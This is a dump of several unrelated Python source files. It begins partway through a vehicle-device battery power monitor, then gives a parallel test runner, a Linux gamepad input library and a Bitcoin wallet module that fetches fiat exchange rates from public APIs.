car, so we don't care if health is None or health.health.hwType == log.HealthData.HwType.unknown: with self.integration_lock: self.last_measurement_time = None self.next_pulsed_measurement_time = None self.power_used_uWh = 0 return # Low-pass battery voltage self.car_voltage_mV = ((health.health.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K))) # Cap the car battery power and save it in a param every 10-ish seconds self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0) self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh) if now - self.last_save_time >= 10: put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh))) self.last_save_time = now # First measurement, set integration time with self.integration_lock: if self.last_measurement_time is None: self.last_measurement_time = now return if (health.health.ignitionLine or health.health.ignitionCan): # If there is ignition, we integrate the charging rate of the car with self.integration_lock: self.power_used_uWh = 0 integration_time_h = (now - self.last_measurement_time) / 3600 if integration_time_h < 0: raise ValueError(f"Negative integration time: {integration_time_h}h") self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h) self.last_measurement_time = now else: # No ignition, we integrate the offroad power used by the device is_uno = health.health.hwType == log.HealthData.HwType.uno # Get current power draw somehow current_power = 0 if TICI: with open("/sys/class/hwmon/hwmon1/power1_input") as f: current_power = int(f.read()) / 1e6 elif get_battery_status() == 'Discharging': # If the battery is discharging, we can use this measurement # On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in current_power = ((get_battery_voltage() / 1000000) * (get_battery_current() / 1000000)) elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now): # TODO: Figure out why this is off by a factor of 3/4??? FUDGE_FACTOR = 1.33 # Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal def perform_pulse_measurement(now): try: set_battery_charging(False) time.sleep(5) # Measure for a few sec to get a good average voltages = [] currents = [] for _ in range(6): voltages.append(get_battery_voltage()) currents.append(get_battery_current()) time.sleep(1) current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000)) self._perform_integration(now, current_power * FUDGE_FACTOR) # Enable charging again set_battery_charging(True) except Exception: cloudlog.exception("Pulsed power measurement failed") # Start pulsed measurement and return threading.Thread(target=perform_pulse_measurement, args=(now,)).start() self.next_pulsed_measurement_time = None return elif self.next_pulsed_measurement_time is None and not is_uno: # On a charging EON with black panda, or drawing more than 400mA out of a white/grey one # Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is # We shouldn't do this very often, so make sure it has been some long-ish random time interval self.next_pulsed_measurement_time = now + random.randint(120, 180) return else: # Do nothing return # Do the integration self._perform_integration(now, current_power) except Exception: cloudlog.exception("Power monitoring calculation failed") def _perform_integration(self, t, current_power): with self.integration_lock: try: if self.last_measurement_time: integration_time_h = (t - self.last_measurement_time) / 3600 power_used = (current_power * 1000000) * integration_time_h if power_used < 0: raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh") self.power_used_uWh += power_used self.car_battery_capacity_uWh -= power_used self.last_measurement_time = t except Exception: cloudlog.exception("Integration failed") # Get the power usage def get_power_used(self): return int(self.power_used_uWh) def get_car_battery_capacity(self): return int(self.car_battery_capacity_uWh) # See if we need to disable charging def should_disable_charging(self, health, offroad_timestamp): if health is None or offroad_timestamp is None: return False now = sec_since_boot() disable_charging = False disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) disable_charging |= (self.car_battery_capacity_uWh <= 0) disable_charging &= (not health.health.ignitionLine and not health.health.ignitionCan) disable_charging &= (self.params.get("DisablePowerDown") != b"1") return disable_charging # See if we need to shutdown def should_shutdown(self, health, offroad_timestamp, started_seen, LEON): if health is None or offroad_timestamp is None: return False if get_battery_charging(): return False now = sec_since_boot() panda_charging = (health.health.usbPowerMode != log.HealthData.UsbPowerMode.client) BATT_PERC_OFF = 90 # 10 if LEON else 3 delta_ts = now - offroad_timestamp should_shutdown = False # Wait until we have shut down charging before powering down should_shutdown |= (not panda_charging and self.should_disable_charging(health, offroad_timestamp)) should_shutdown |= ((get_battery_capacity() < BATT_PERC_OFF) and (delta_ts > 10) ) should_shutdown &= started_seen return should_shutdown def charging_ctrl(self, msg, ts, to_discharge, to_charge ): if self.ts_last_charging_ctrl is None or (ts - self.ts_last_charging_ctrl) >= 300.: battery_changing = get_battery_charging() if self.ts_last_charging_ctrl: if msg.thermal.batteryPercent >= to_discharge and battery_changing: set_battery_charging(False) elif msg.thermal.batteryPercent <= to_charge and not battery_changing: set_battery_charging(True) self.ts_last_charging_ctrl = ts
runtests.py
#!/usr/bin/python2.7 -B # This file is picked from project testa [https://github.com/TimeExceed/testa.git] # Copyright (c) 2013, Taoda (tyf00@aliyun.com) # All rights reserved. # # Redistribution and use in source and binary forms, with or without modification, # are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, this # list of conditions and the following disclaimer in the documentation and/or # other materials provided with the distribution. # # * Neither the name of the {organization} nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON # ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import sys import os import os.path as op from Queue import Queue import threading import json import subprocess as subprocess import shlex import re from functools import partial from itertools import groupby from datetime import datetime import argparse import termcolor def countCpu(): try: num = os.sysconf('SC_NPROCESSORS_ONLN') return num except (ValueError, OSError, AttributeError): raise NotImplementedError('cannot determine number of cpus') def parseArgs(): parser = argparse.ArgumentParser(description='Run some test cases, which obey testa protocol') parser.add_argument('executables', metavar='program', type=str, nargs='+', help='executables obey testa protocol') parser.add_argument('-l', '--lang', nargs='?', default='lang.config', help='a file specifying how to run executable for different programming languages. [default: lang.config]') parser.add_argument('-d', '--dir', nargs='?', default='test_results', help='the directory where results of test cases are put [default: test_results]') parser.add_argument('-j', '--jobs', nargs='?', type=int, default=countCpu(), help='how many test cases can run parallelly [default: as many as CPU cores]') parser.add_argument('-i', '--include', nargs='?', default='.*', help='A regular expression. Only test cases matching this pattern will be run. [default: ".*"]') parser.add_argument('-e', '--exclude', nargs='?', default='^$', help='A regular expression. Test cases matching this pattern will not be run. [default: "^$"]') parser.add_argument('--timeout', nargs='?', help='how long a case is allowed to run (in msec) [default: disable]') parser.add_argument('--report', nargs='?', help='report as a json file') args = parser.parse_args() return args def readLangCfg(fn): with open(fn) as f: cfg = json.load(f) if type(cfg) != list: raise Exception('language config must be a list') for lang in cfg: if type(lang) != dict: raise Exception('each language in language config must be a dict') if 'language' not in lang: raise Exception('need "language" item for name of language') if 'pattern' not in lang: raise Exception('"pattern" is necessary for "%s", which must be a regular expression to match filenames' % lang["language"]) if 'execute' not in lang: raise Exception('"execute" is necessary for "%s", which must a list of args' % lang["language"]) if '%(arg)s' not in lang['execute']: raise Exception('"%(arg)s" is necessary for "execute" in "%s", which stands for the arg of testa protocol' % lang["language"]) return cfg kOk = 'OK' kError = 'Error' kTimeout = 'Timeout' kCancel = 'Cancel' gCancelled = False def work(opts, qin, qout): global gCancelled try: while True: cs = qin.get() if cs == None: break if gCancelled: break args = shlex.split(cs['execute']) kws = {} with open(cs['stdout'], 'wb') as stdout, open(cs['stderr'], 'wb') as stderr: kws['stdout'] = stdout kws['stderr'] = stderr kws['cwd'] = cs['cwd'] cs['start'] = datetime.utcnow() try: subprocess.check_call(args, **kws) cs['stop'] = datetime.utcnow() qout.put([kOk, cs['name'], cs]) except subprocess.CalledProcessError: stderr.write(str(args)) stderr.write('\n') stderr.write(str(kws)) stderr.write('\n') cs['stop'] = datetime.utcnow() qout.put([kError, cs['name'], cs]) except KeyboardInterrupt: qout.put([kCancel, 'Ctrl-C']) except Exception as ex: qout.put([kCancel, str(ex)]) def launchWorkers(opts): reqQ = Queue() resQ = Queue() workers = [threading.Thread(target=work, args=(opts, reqQ, resQ)) for _ in range(opts.jobs)] for w in workers: w.start() return reqQ, resQ, workers def stopWorkers(reqQ, workers): for _ in range(len(workers)): reqQ.put(None) for w in workers: w.join() def error(msg): print msg sys.exit(1) def findMatchLanguage(exe, langs): for lang in langs: if re.match(lang['pattern'], exe): return lang return {'language': None, 'execute': '%(prog)s %(arg)s'} def getExecutableArgs(exe, langs): lang = findMatchLanguage(exe, langs) exe = op.abspath(exe) return lang['execute'] % {'prog': exe, 'arg': '--show-cases'} def collectCases(opts, langs, reqQ, resQ): exes = [] for exe in opts.executables: exeArgs = getExecutableArgs(exe, langs) progDir = op.abspath(op.dirname(exe)) testDir = op.abspath(op.join(opts.dir, exe)) if not op.exists(testDir): os.makedirs(testDir) exes.append({ 'name': exe, 'execute': exeArgs, 'cwd': progDir, 'stdout': op.join(testDir, 'cases.out'), 'stderr': op.join(testDir, 'cases.err')}) for e in exes: reqQ.put(e) cases = [] for _ in range(len(exes)): res = resQ.get() assert res[0] == kOk, res exe = res[1] with open(res[2]['stdout']) as f: cs = [x.strip() for x in f] cs = [x for x in cs if x] lang = findMatchLanguage(exe, langs) for c in cs: cases.append({ 'name': '%s/%s' % (exe, c), 'execute': lang['execute'] % {'prog': op.abspath(exe), 'arg': c}, 'cwd': res[2]['cwd'], 'stdout': op.join(opts.dir, exe, '%s.out' % c), 'stderr': op.join(opts.dir, exe, '%s.err' % c)}) return cases def colored(s, color): if not os.isatty(sys.stdout.fileno()): return s else: return termcolor.colored(s, color) def filterCases(opts, cases): cases = [x for x in cases if not re.search(opts.exclude, x['name'])] cases = [x for x in cases if re.search(opts.include, x['name'])] return cases def dispatchCases(cases, reqQ): for cs in cases: reqQ.put(cs) def collectResults(opts, cases, resQ): passed = [] failed = [] caseNum = len(cases) while len(passed) + len(failed) < caseNum: res = resQ.get() if res[0] == kOk: passed.append(res[2]) result = colored('pass', 'green') elif res[0] == kError: failed.append(res[2]) result = colored('fail', 'red') elif res[0] == kTimeout: failed.append(res[2]) result = colored('kill', 'red') else: error(res[1]) print('%d/%d %s: %s costs %s secs' % ( len(passed) + len(failed), caseNum, result, res[1], str(res[2]['stop'] - res[2]['start']))) return passed, failed if __name__ == '__main__': opts = parseArgs() langs = readLangCfg(opts.lang) reqQ, resQ, workers = launchWorkers(opts) try: cases = collectCases(opts, langs, reqQ, resQ) cases = filterCases(opts, cases) dispatchCases(cases, reqQ) _, failed = collectResults(opts, cases, resQ) print print '%d failed' % len(failed) for cs in failed: print cs['name'] finally: stopWorkers(reqQ, workers)
gamepad.py
# -*- coding: utf-8 -*- """Main module.""" from __future__ import print_function import os import struct import array import threading from fcntl import ioctl axis_names = { 0x00: 'x', 0x01: 'y', 0x02: 'z', 0x03: 'rx', 0x04: 'ry', 0x05: 'rz', 0x06: 'throttle', 0x07: 'rudder', 0x08: 'wheel', 0x09: 'gas', 0x0a: 'brake', 0x10: 'hat0x', 0x11: 'hat0y', 0x12: 'hat1x', 0x13: 'hat1y', 0x14: 'hat2x', 0x15: 'hat2y', 0x16: 'hat3x', 0x17: 'hat3y', 0x18: 'pressure', 0x19: 'distance', 0x1a: 'tilt_x', 0x1b: 'tilt_y', 0x1c: 'tool_width', 0x20: 'volume', 0x28: 'misc', } button_names = { 0x120: 'trigger', 0x121: 'thumb', 0x122: 'thumb2', 0x123: 'top', 0x124: 'top2', 0x125: 'pinkie', 0x126: 'base', 0x127: 'base2', 0x128: 'base3', 0x129: 'base4', 0x12a: 'base5', 0x12b: 'base6', 0x12f: 'dead', 0x130: 'a', 0x131: 'b', 0x132: 'c', 0x133: 'x', 0x134: 'y', 0x135: 'z', 0x136: 'tl', 0x137: 'tr', 0x138: 'tl2', 0x139: 'tr2', 0x13a: 'select', 0x13b: 'start', 0x13c: 'mode', 0x13d: 'thumbl', 0x13e: 'thumbr', 0x220: 'dpad_up', 0x221: 'dpad_down', 0x222: 'dpad_left', 0x223: 'dpad_right', # XBox 360 controller uses these codes. 0x2c0: 'dpad_left', 0x2c1: 'dpad_right', 0x2c2: 'dpad_up', 0x2c3: 'dpad_down', } common_names = { "trigger": "btn1", "thumb": "btn2", "thumb2": "btn3", "top": "btn4", # "top2": "btn5", # "pinkie": "btn6", # "base": "btn7", # "base2": "btn8", # "base3": "btn9", # "base4": "btn10", "base5": "btn11", "base6": "btn12", "base": "l1", "top2": "l2", "base2": "r1", "pinkie": "r2", "base3": "select", "base4": "start", "dpad_left": "dpad_left", "dpad_up": "dpad_up", "dpad_right": "dpad_right", "dpad_down": "dpad_down", "hat0x": "dpadx", "hat0y": "dpady", "x": "lx", "y": "ly", "rz": "rx", "z": "ry", } device_name_keywords = ( "game", "gaming", "gamepad", "controller", "joystick", ) class Handler: def __init__(self, event, fn, *args, **kwargs): self.event = event self.fn = fn self.args = args self.kwargs = kwargs def __call__(self, *a, **kw): return self.fn(*(self.args + a), **dict(self.kwargs, **kw)) class Gamepad: def __init__(self, device=None): self._device = device self._file = None self._name = "" self._handlers = [] self._connected = False self._num_axes = 0 self._axis_map = [] self._axis_states = {} self._num_buttons = 0 self._button_map = [] self._button_states = {} self._thread = threading.Thread(target=self._thread_worker) self._thread.setDaemon(True) self._thread.start() # private methods def _get_device_list(self): for filename in os.listdir("/dev/input"): if filename.startswith("js"): yield os.path.join("/dev/input", filename) def _open_device(self, device): return open(device, "rb") def _get_name(self, _file): buf = array.array('B', [0] * 64) ioctl(_file, 0x80006a13 + (0x10000 * len(buf)), buf) return buf.tobytes().decode("utf-8") def _get_num_axes(self, _file): buf = array.array('B', [0]) ioctl(_file, 0x80016a11, buf) # JSIOCGAXES return buf[0] def _get_num_buttons(self, _file): buf = array.array('B', [0]) ioctl(_file, 0x80016a12, buf) # JSIOCGBUTTONS return buf[0] def _init_axis_map(self, _file): buf = array.array('B', [0] * 0x40) ioctl(_file, 0x80406a32, buf) # JSIOCGAXMAP for axis in buf[:self._get_num_axes(_file)]: axis_name = axis_names.get(axis, 'unknown(0x%02x)' % axis) self._axis_map.append(axis_name) self._axis_states[axis_name] = 0.0 def _init_button_map(self, _file): buf = array.array('H', [0] * 200) ioctl(_file, 0x80406a34, buf) # JSIOCGBTNMAP for button in buf[:self._get_num_buttons(_file)]: button_name = button_names.get(button, 'unknown(0x%03x)' % button) self._button_map.append(button_name) self._button_states[button_name] = False # event handlers def _handle_button_event(self, button, value): for h in self._handlers: if ( h.event == common_names[button] or h.event == common_names[button] + ":pressed"): h(value, h.event) def _handle_button_released_event(self, button, value): for h in self._handlers: if h.event == common_names[button] + ":released": h(value, h.event) def _handle_button_changed_event(self, button, value): for h in self._handlers: if h.event == common_names[button] + ":changed": h(value, h.event) def _handle_axis_event(self, axis, value): for h in self._handlers: if h.event == common_names[axis]: h(value, h.event) def _read_device(self): event_buf = self._file.read(8) if (event_buf): ts, value, event_type, number = struct.unpack("IhBB", event_buf) if event_type & 0x80: # initial reading return if event_type & 0x81: # button button = self._button_map[number] if button: self._button_states[button] = bool(value) self._handle_button_changed_event(button, value) if value: self._handle_button_event(button, value) else: self._handle_button_released_event(button, value) if event_type & 0x02: # axis axis = self._axis_map[number] if axis: fvalue = value / 32767.0 self._axis_states[axis] = fvalue self._handle_axis_event(axis, fvalue) def _connect_to_device(self, device_path): _file = self._open_device(device_path) name = self._get_name(_file) for kw in device_name_keywords: if kw in name.lower(): self._device = device_path self._file = _file self._connected = True self._on_connect() return def _update_connection(self): if not (self._device and os.path.exists(self._device) and self._connected): self._connected = False # If the user specifies a device path, use it. Otherwise, make an # educated guess if self._device: self._connect_to_device(self._device) else: for device_path in self._get_device_list(): self._connect_to_device(device_path) def _on_connect(self): self._init_button_map(self._file) self._init_axis_map(self._file) self._name = self._get_name(self._file) # notify the user that this gamepad is connected for handler in self._handlers: if handler.event == "connect": handler() def _on_disconnect(self): for handler in self._handlers: if handler.event == "disconnect": handler() def _thread_worker(self, *args): while (1): try: self._update_connection() if self._connected: self._read_device() except IOError: if self.connected: self._on_disconnect() # public methods/properties @property def connected(self): return self._connected @property def device(self): return self._device @property def name(self): return self._name @property def inputs(self): return common_names.values() def axis(self, axis): if self._connected: for k, v in self._axis_states.items(): if common_names[k] == axis: return v else: return 0.0 def button(self, button): if self._connected: for k, v in self._button_states.items(): if common_names[k] == button: return bool(v) else: return False def on(self, event, handler, *args, **kwargs): self._handlers.append(Handler(event, handler, *args, **kwargs)) def watch_all(self): def _on_connect(): print("Gamepad connected: {}".format(self.name)) self.on("connect", _on_connect) def _on_disconnect(): print("Gamepad disconnected: {}".format(self.name)) self.on("disconnect", _on_disconnect) def f(value, event): print("Gamepad: {} => {}".format(event, value)) for event in self.inputs: self.on(event, f) self.on(event+":pressed", f) self.on(event+":released", f) self.on(event+":changed", f)
exchange_rate.py
from datetime import datetime import inspect import requests import sys from threading import Thread import time import csv from decimal import Decimal from .bitcoin import COIN from .i18n import _ from .util import PrintError, ThreadJob # See https://en.wikipedia.org/wiki/ISO_4217 CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0, 'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0, 'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3, 'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0, 'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0, 'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0} class ExchangeBase(PrintError): def __init__(self, on_quotes, on_history): self.history = {} self.quotes = {} self.on_quotes = on_quotes self.on_history = on_history def get_json(self, site, get_string): # APIs must have https url = ''.join(['https://', site, get_string]) response = requests.request('GET', url, headers={'User-Agent' : 'Wampum'}) return response.json() def get_csv(self, site, get_string): url = ''.join(['https://', site, get_string]) response = requests.request('GET', url, headers={'User-Agent' : 'Wampum'}) reader = csv.DictReader(response.content.decode().split('\n')) return list(reader) def name(self): return self.__class__.__name__ def update_safe(self, ccy): try: self.print_error("getting fx quotes for", ccy) self.quotes = self.get_rates(ccy) self.print_error("received fx quotes") except BaseException as e: self.print_error("failed fx quotes:", e) self.on_quotes() def update(self, ccy): t = Thread(target=self.update_safe, args=(ccy,)) t.setDaemon(True) t.start() def get_historical_rates_safe(self, ccy): try: self.print_error("requesting fx history for", ccy) self.history[ccy] = self.historical_rates(ccy) self.print_error("received fx history for", ccy) self.on_history() except BaseException as e: self.print_error("failed fx history:", e) def get_historical_rates(self, ccy): result = self.history.get(ccy) if not result and ccy in self.history_ccys(): t = Thread(target=self.get_historical_rates_safe, args=(ccy,)) t.setDaemon(True) t.start() return result def history_ccys(self): return [] def historical_rate(self, ccy, d_t): return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d')) def get_currencies(self): rates = self.get_rates('') return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3]) class BitcoinAverage(ExchangeBase): def get_rates(self, ccy): json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short') return dict([(r.replace("BTC", ""), Decimal(json[r]['last'])) for r in json if r != 'timestamp']) def history_ccys(self): return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS', 'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD', 'ZAR'] def historical_rates(self, ccy): history = self.get_csv('apiv2.bitcoinaverage.com', "/indices/global/history/BTC%s?period=alltime&format=csv" % ccy) return dict([(h['DateTime'][:10], h['Average']) for h in history]) class Bitcointoyou(ExchangeBase): def get_rates(self, ccy): json = self.get_json('bitcointoyou.com', "/API/ticker.aspx") return {'BRL': Decimal(json['ticker']['last'])} def history_ccys(self): return ['BRL'] class BitcoinVenezuela(ExchangeBase): def get_rates(self, ccy): json = self.get_json('api.bitcoinvenezuela.com', '/') rates = [(r, json['BTC'][r]) for r in json['BTC'] if json['BTC'][r] is not None] # Giving NULL for LTC return dict(rates) def history_ccys(self): return ['ARS', 'EUR', 'USD', 'VEF'] def historical_rates(self, ccy): return self.get_json('api.bitcoinvenezuela.com', "/historical/index.php?coin=BTC")[ccy +'_BTC'] class Bitmarket(ExchangeBase): def get_rates(self, ccy): json = self.get_json('www.bitmarket.pl', '/json/BTCPLN/ticker.json') return {'PLN': Decimal(json['last'])} class BitPay(ExchangeBase): def get_rates(self, ccy): json = self.get_json('bitpay.com', '/api/rates') return dict([(r['code'], Decimal(r['rate'])) for r in json]) class Bitso(ExchangeBase): def get_rates(self, ccy): json = self.get_json('api.bitso.com', '/v2/ticker') return {'MXN': Decimal(json['last'])} class BitStamp(ExchangeBase): def get_rates(self, ccy): json = self.get_json('www.bitstamp.net', '/api/ticker/') return {'USD': Decimal(json['last'])} class Bitvalor(ExchangeBase): def get_rates(self,ccy): json = self.get_json('api.bitvalor.com', '/v1/ticker.json') return {'BRL': Decimal(json['ticker_1h']['total']['last'])} class BlockchainInfo(ExchangeBase): def get_rates(self, ccy): json = self.get_json('blockchain.info', '/ticker') return dict([(r, Decimal(json[r]['15m'])) for r in json]) class BTCChina(ExchangeBase): def get_rates(self, ccy): json = self.get_json('data.btcchina.com', '/data/ticker') return {'CNY': Decimal(json['ticker']['last'])} class BTCParalelo(ExchangeBase): def get_rates(self, ccy): json = self.get_json('btcparalelo.com', '/api/price') return {'VEF': Decimal(json['price'])} class Coinbase(ExchangeBase): def get_rates(self, ccy): json = self.get_json('coinbase.com', '/api/v1/currencies/exchange_rates') return dict([(r[7:].upper(), Decimal(json[r])) for r in json if r.startswith('btc_to_')]) class CoinDesk(ExchangeBase): def get_rates(self, ccy): dicts = self.get_json('api.coindesk.com', '/v1/bpi/supported-currencies.json') json = self.get_json('api.coindesk.com', '/v1/bpi/currentprice/%s.json' % ccy) ccys = [d['currency'] for d in dicts] result = dict.fromkeys(ccys) result[ccy] = Decimal(json['bpi'][ccy]['rate_float']) return result def history_starts(self): return { 'USD': '2012-11-30' } def history_ccys(self): return self.history_starts().keys() def historical_rates(self, ccy): start = self.history_starts()[ccy] end = datetime.today().strftime('%Y-%m-%d') # Note ?currency and ?index don't work as documented. Sigh. query = ('/v1/bpi/historical/close.json?start=%s&end=%s' % (start, end)) json = self.get_json('api.coindesk.com', query) return json['bpi'] class Coinsecure(ExchangeBase): def get_rates(self, ccy): json = self.get_json('api.coinsecure.in', '/v0/noauth/newticker') return {'INR': Decimal(json['lastprice'] / 100.0 )} class Foxbit(ExchangeBase): def get_rates(self,ccy): json = self.get_json('api.bitvalor.com', '/v1/ticker.json') return {'BRL': Decimal(json['ticker_1h']['exchanges']['FOX']['last'])} class itBit(ExchangeBase): def get_rates(self, ccy): ccys = ['USD', 'EUR', 'SGD'] json = self.get_json('api.itbit.com', '/v1/markets/XBT%s/ticker' % ccy) result = dict.fromkeys(ccys) if ccy in ccys: result[ccy] = Decimal(json['lastPrice']) return result class Kraken(ExchangeBase): def get_rates(self, ccy): ccys = ['EUR', 'USD', 'CAD', 'GBP', 'JPY'] pairs = ['XBT%s' % c for c in ccys] json = self.get_json('api.kraken.com', '/0/public/Ticker?pair=%s' % ','.join(pairs)) return dict((k[-3:], Decimal(float(v['c'][0]))) for k, v in json['result'].items()) class LocalBitcoins(ExchangeBase): def get_rates(self, ccy): json = self.get_json('localbitcoins.com', '/bitcoinaverage/ticker-all-currencies/') return dict([(r, Decimal(json[r]['rates']['last'])) for r in json]) class MercadoBitcoin(ExchangeBase): def get_rates(self, ccy): json = self.get_json('api.bitvalor.com', '/v1/ticker.json') return {'BRL': Decimal(json['ticker_1h']['exchanges']['MBT']['last'])} class NegocieCoins(ExchangeBase): def get_rates(self,ccy): json = self.get_json('api.bitvalor.com', '/v1/ticker.json') return {'BRL': Decimal(json['ticker_1h']['exchanges']['NEG']['last'])} def history_ccys(self): return ['BRL'] class Unocoin(ExchangeBase): def get_rates(self, ccy): json = self.get_json('www.unocoin.com', 'trade?buy') return {'INR': Decimal(json)} class WEX(ExchangeBase): def get_rates(self, ccy): json_eur = self.get_json('wex.nz', '/api/3/ticker/btc_eur') json_rub = self.get_json('wex.nz', '/api/3/ticker/btc_rur') json_usd = self.get_json('wex.nz', '/api/3/ticker/btc_usd') return {'EUR': Decimal(json_eur['btc_eur']['last']), 'RUB': Decimal(json_rub['btc_rur']['last']), 'USD': Decimal(json_usd['btc_usd']['last'])} class Winkdex(ExchangeBase): def get_rates(self, ccy): json = self.get_json('winkdex.com', '/api/v0/price') return {'USD': Decimal(json['price'] / 100.0)} def history_ccys(self): return ['USD'] def historical_rates(self, ccy): json = self.get_json('winkdex.com', "/api/v0/series?start_time=1342915200") history = json['series'][0]['results'] return dict([(h['timestamp'][:10], h['price'] / 100.0) for h in history]) def dictinvert(d): inv = {} for k, vlist in d.items(): for v in vlist: keys = inv.setdefault(v, []) keys.append(k) return inv def get_exchanges_and_currencies(): import os, json path = os.path.join(os.path.dirname(__file__), 'currencies.json') try: with open(path, 'r') as f: return json.loads(f.read()) except: pass d = {} is_exchange = lambda obj: (inspect.isclass(obj) and issubclass(obj, ExchangeBase) and obj != ExchangeBase) exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange)) for name, klass in exchanges.items(): exchange = klass(None, None) try: d[name] = exchange.get_currencies() except: continue with open(path, 'w') as f: f.write(json.dumps(d, indent=4, sort_keys=True)) return d CURRENCIES = get_exchanges_and_currencies() def get_exchanges_by_ccy(history=True): if not history: return dictinvert(CURRENCIES) d = {} exchanges = CURRENCIES.keys() for name in exchanges: klass = globals()[name] exchange = klass(None, None) d[name] = exchange.history_ccys() return dictinvert(d) class FxThread(ThreadJob): def __init__(self, config, network): self.config = config self.network = network self.ccy = self.get_currency() self.history_used_spot = False self.ccy_combo = None self.hist_checkbox = None self.set_exchange(self.config_exchange()) def get_currencies(self, h): d = get_exchanges_by_ccy(h) return sorted(d.keys()) def get_exchanges_by_ccy(self, ccy, h): d = get_exchanges_by_ccy(h) return d.get(ccy, []) def ccy_amount_str(self, amount, commas): prec = CCY_PRECISIONS.get(self.ccy, 2) fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec)) return fmt_str.format(round(amount, prec)) def run(self): # This runs from the plugins thread which catches exceptions if self.is_enabled(): if self.timeout ==0 and self.show_history(): self.exchange.get_historical_rates(self.ccy) if self.timeout <= time.time(): self.timeout = time.time() + 150 self.exchange.update(self.ccy) def is_enabled(self): return bool(self.config.get('use_exchange_rate')) def set_enabled(self, b): return self.config.set_key('use_exchange_rate', bool(b)) def get_history_config(self): return bool(self.config.get('history_rates')) def set_history_config(self, b): self.config.set_key('history_rates', bool(b)) def get_fiat_address_config(self): return bool(self.config.get('fiat_address')) def set_fiat_address_config(self, b): self.config.set_key('fiat_address', bool(b)) def get_currency(self): '''Use when dynamic fetching is needed''' return self.config.get("currency", "EUR") def config_exchange(self): return self.config.get('use_exchange', 'BitcoinAverage') def show_history(self): return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys() def set_currency(self, ccy): self.ccy = ccy self.config.set_key('currency', ccy, True) self.timeout = 0 # Because self.ccy changes self.on_quotes() def set_exchange(self, name): class_ = globals().get(name, BitcoinAverage) self.print_error("using exchange", name) if self.config_exchange() != name: self.config.set_key('use_exchange', name, True) self.exchange = class_(self.on_quotes, self.on_history) # A new exchange means new fx quotes, initially empty. Force # a quote refresh self.timeout = 0 def on_quotes(self): self.network.trigger_callback('on_quotes') def on_history(self): self.network.trigger_callback('on_history') def exchange_rate(self): '''Returns None, or the exchange rate as a Decimal''' rate = self.exchange.quotes.get(self.ccy) if rate: return Decimal(rate) def format_amount_and_units(self, btc_balance): rate = self.exchange_rate() return '' if rate is None else "%s %s" % (self.value_str(btc_balance, rate), self.ccy) def get_fiat_status_text(self, btc_balance, base_unit, decimal_point): rate = self.exchange_rate() return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (base_unit, self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy) def value_str(self, satoshis, rate): if satoshis is None: # Can happen with incomplete history return _("Unknown") if rate: value = Decimal(satoshis) / COIN * Decimal(rate) return "%s" % (self.ccy_amount_str(value, True)) return _("No data") def history_rate(self, d_t): rate = self.exchange.historical_rate(self.ccy, d_t) # Frequently there is no rate for today, until tomorrow :) # Use spot quotes in that case if rate is None and (datetime.today().date() - d_t.date()).days <= 2: rate = self.exchange.quotes.get(self.ccy) self.history_used_spot = True return rate def historical_value_str(self, satoshis, d_t): rate = self.history_rate(d_t) return self.value_str(satoshis, rate)
_http_session_local_impl.py
